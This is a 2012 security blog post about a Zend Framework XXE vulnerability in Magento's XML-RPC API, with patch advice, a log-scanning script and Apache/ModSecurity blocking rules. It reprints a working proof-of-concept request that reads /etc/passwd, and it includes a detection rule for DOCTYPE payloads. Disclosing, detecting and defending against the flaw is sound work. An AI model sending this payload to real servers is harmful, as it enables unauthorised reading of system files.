Friday, July 6, 2012

Magento / Zend Framework Vulnerability

There is a critical vulnerability in the Zend Framework, which Magento relies on heavily: an XML External Entity (XXE) injection in its XML-RPC package. For those of you not familiar with Magento, it is an e-commerce platform available as both an open source Community Edition and a commercial Enterprise Edition. Any Magento installation whose XML-RPC API endpoint is reachable is exposed to the Zend Framework XML-RPC vulnerability, whether or not you actively use that API.

Magento has released a bulletin advising all of its users to apply a patch, which Magento published yesterday, 10 days after Zend's own release.

Why am I writing about a disclosure that is 11 days old? Well, Magento is a heavily used product, and those using it may not be aware that an official patch was released yesterday by the company. I also believe we should freely share what is found and help users out there mitigate the risks.


Credit for discovering the vulnerability goes to Johannes Greil and Kestutis Gudinavicius of SEC Consult Vulnerability Lab.

Proof of Concept (credit: SEC Consult Vulnerability Lab):

Magento:

POST /index.php/api/xmlrpc HTTP/1.1
Host: $host
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE foo [
  <!ELEMENT methodName ANY >
  <!ENTITY xxe SYSTEM "file:///etc/passwd" >]>
<methodCall>
  <methodName>&xxe;</methodName>
</methodCall>

The methodCall body that references the entity was cut from the excerpt as originally pasted and is restored above: the server expands &xxe; when it parses methodName, and the contents of /etc/passwd come back in the response (in the fault message it returns for the unknown method).

Example using a SoapUI request (screenshot)

As you can see above, I was able to retrieve the /etc/passwd file from the system using a call to the XML-RPC API on Magento.


Patch your systems immediately!!!

Magento has made the patches available in the solution section of its bulletin for both the Community and Enterprise Editions as of yesterday. You can apply them live with little impact to your site. If you use caching, flush the cache afterwards or restart your Apache server.

How do I know if I have already fallen victim to this vulnerability?
This will be tough to tell. If you do not use the Magento XML-RPC API, any POST request to the endpoint is a request you did not expect; look in your access logs for lines like the following (client IP removed):

- - [06/Jul/2012:16:25:52 -0400] "POST /index.php/api/xmlrpc HTTP/1.1" 200 722 "-" "Jakarta Commons-HttpClient/3.1"
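The access-log check described above, as an added example (not code from the original post or from Magento): it parses Apache "combined" format lines, keeps only POSTs to /index.php/api/xmlrpc (with or without a trailing slash or query string, since all of them reach the same controller), and totals the bytes each client got back on HTTP 200, which is what a successful file read would show up as. The sample log lines, IPs and user agents are constructed for the example; the first line mirrors the one quoted above with a placeholder address.

```python
"""Added example (not from the original post): scan an Apache "combined" access
log for POST requests to the Magento XML-RPC endpoint. If you do not use the
XML-RPC API, every hit is a request you did not expect. The sample log lines
below are constructed; IPs and user agents are placeholders."""
import re
import sys
from collections import namedtuple

XMLRPC_PATH = "/index.php/api/xmlrpc"

# Apache combined log format: ip ident user [time] "request" status size "referer" "agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) (?P<proto>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\d+|-) "(?P<referer>[^"]*)" "(?P<agent>[^"]*)"$'
)

Hit = namedtuple("Hit", "ip ts status size agent")


def parse_line(line):
    """Return the fields of one combined-format line, or None if it does not parse."""
    m = LOG_RE.match(line.rstrip("\n"))
    return m.groupdict() if m else None


def is_xmlrpc_post(entry):
    """True for a POST whose path is the XML-RPC controller, with or without a
    trailing slash or query string (all of them reach the same controller)."""
    path = entry["path"]
    return entry["method"] == "POST" and (
        path == XMLRPC_PATH
        or path.startswith(XMLRPC_PATH + "/")
        or path.startswith(XMLRPC_PATH + "?")
    )


def find_xmlrpc_posts(lines):
    """All XML-RPC POSTs in the given log lines, in log order."""
    hits = []
    for line in lines:
        entry = parse_line(line)
        if entry and is_xmlrpc_post(entry):
            size = 0 if entry["size"] == "-" else int(entry["size"])
            hits.append(Hit(entry["ip"], entry["ts"], int(entry["status"]), size, entry["agent"]))
    return hits


def summarize(hits):
    """Per client: (number of POSTs, bytes returned on HTTP 200). A 200 that
    returned far more than a normal fault message is what an XXE read looks like."""
    by_ip = {}
    for h in hits:
        count, size = by_ip.get(h.ip, (0, 0))
        by_ip[h.ip] = (count + 1, size + h.size if h.status == 200 else size)
    return by_ip


# Constructed sample; the first line mirrors the one quoted in the post with a placeholder IP.
SAMPLE_LOG = """\
192.0.2.10 - - [06/Jul/2012:16:25:52 -0400] "POST /index.php/api/xmlrpc HTTP/1.1" 200 722 "-" "Jakarta Commons-HttpClient/3.1"
198.51.100.7 - - [06/Jul/2012:16:26:03 -0400] "GET /index.php/customer/account/login/ HTTP/1.1" 200 15233 "-" "Mozilla/5.0"
192.0.2.10 - - [06/Jul/2012:16:26:10 -0400] "POST /index.php/api/xmlrpc HTTP/1.1" 200 1988 "-" "Jakarta Commons-HttpClient/3.1"
203.0.113.5 - - [06/Jul/2012:16:30:41 -0400] "POST /index.php/api/xmlrpc/ HTTP/1.1" 403 212 "-" "python-requests/0.13.1"
198.51.100.7 - - [06/Jul/2012:16:31:00 -0400] "GET /index.php/api/xmlrpc HTTP/1.1" 200 1 "-" "Mozilla/5.0"
"""

if __name__ == "__main__":
    # Usage: python xmlrpc_hits.py /var/log/apache2/access.log   (no argument: the sample above)
    lines = open(sys.argv[1]) if len(sys.argv) > 1 else SAMPLE_LOG.splitlines()
    hits = find_xmlrpc_posts(lines)
    for h in hits:
        print("%s %s %d %d %s" % (h.ip, h.ts, h.status, h.size, h.agent))
    for ip, (count, size) in sorted(summarize(hits).items()):
        print("%s: %d POST(s), %d bytes returned on 200" % (ip, count, size))
```

Run it against a real log, then look at who is POSTing and how much came back: on the constructed sample, 192.0.2.10 made two POSTs and received 2710 bytes on 200 responses, while the 403 from 203.0.113.5 counts as a hit but contributes no bytes, which is the pattern you would see once the endpoint has been blocked at the web server.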

What if I cannot patch right now and want to protect myself, even though I am not using the Magento XML-RPC API?

You have two options. The first is to follow Magento's workaround below.

Workaround (taken from the Magento blog post)

If the patch cannot be applied immediately, the following instructions can be followed to temporarily disable the RPC functionality that contains the vulnerability. Please be advised, any integrations that rely on the XMLRPC API functionality will no longer work after this workaround is implemented.
  1. On the Magento web server, navigate to the www-root where Magento app files are stored.
  2. In the www-root, navigate to /app/code/core/Mage/Api/controllers.
  3. Open XmlrpcController.php for editing.
  4. Comment out or delete the body of the method: public indexAction()
  5. Save the changes.

Note that this edits a core Magento file, so remember to revert the change once the official patch is applied.

Optional Workaround
Deny access to the XML-RPC API URI either in Apache (mod_rewrite or a LocationMatch block) or, if you are running ModSecurity, with a rule there.

URI: /index.php/api/xmlrpc
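The web-server side of the optional workaround, as an added example (not from the original post or from Magento). It shows the LocationMatch, mod_rewrite and ModSecurity forms of the same block; the ModSecurity rule ids are arbitrary values chosen for this example, and the DOCTYPE rule at the end is an assumption about your deployment (it needs request body access enabled) that lets legitimate XML-RPC integrations keep working while rejecting any request that carries a DTD, which is the one thing the XXE payload cannot do without.

```apache
# Added example (not from the original post or from Magento). Place the
# LocationMatch block in the server or vhost config (it is not allowed in .htaccess).
<LocationMatch "^/index\.php/api/xmlrpc">
    # Apache 2.2
    Order deny,allow
    Deny from all
    # Apache 2.4 equivalent:
    # Require all denied
</LocationMatch>

# mod_rewrite form, usable from Magento's own .htaccess in the web root.
# REQUEST_URI is matched rather than the rule pattern so that the PATH_INFO
# part (/api/xmlrpc) is seen in per-directory context too.
RewriteEngine On
RewriteCond %{REQUEST_URI} ^/index\.php/api/xmlrpc
RewriteRule .* - [F,L]

# ModSecurity 2.x form: refuse the endpoint outright (rule ids are example values).
SecRule REQUEST_URI "@beginsWith /index.php/api/xmlrpc" \
    "id:1000001,phase:1,t:none,deny,status:403,log,msg:'Magento XML-RPC endpoint blocked pending Zend XXE patch'"

# Narrower alternative if you do need the API: allow the endpoint but reject any
# request body that declares a DTD. Assumes SecRequestBodyAccess On; the first
# rule forces REQUEST_BODY to be populated for text/xml requests.
SecRequestBodyAccess On
SecRule REQUEST_URI "@beginsWith /index.php/api/xmlrpc" \
    "id:1000002,phase:1,t:none,pass,nolog,ctl:forceRequestBodyVariable=On"
SecRule REQUEST_URI "@beginsWith /index.php/api/xmlrpc" \
    "id:1000003,phase:2,t:none,chain,deny,status:403,log,msg:'DOCTYPE in XML-RPC request body (XXE attempt)'"
    SecRule REQUEST_BODY "@contains <!DOCTYPE" "t:none"
```

Use one form, not all of them. The full deny (LocationMatch, rewrite, or rule 1000001) is the safe default when nobody uses the API; the DOCTYPE rule is only for sites that must keep the API up until the patch is in, and XML-RPC requests from normal clients never contain a DOCTYPE, so it should not break a working integration.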


Special thanks to @thronic for bringing this vulnerability to my attention today; he is a great PHP developer if you are looking for one.

© Bruce Martins
All rights reserved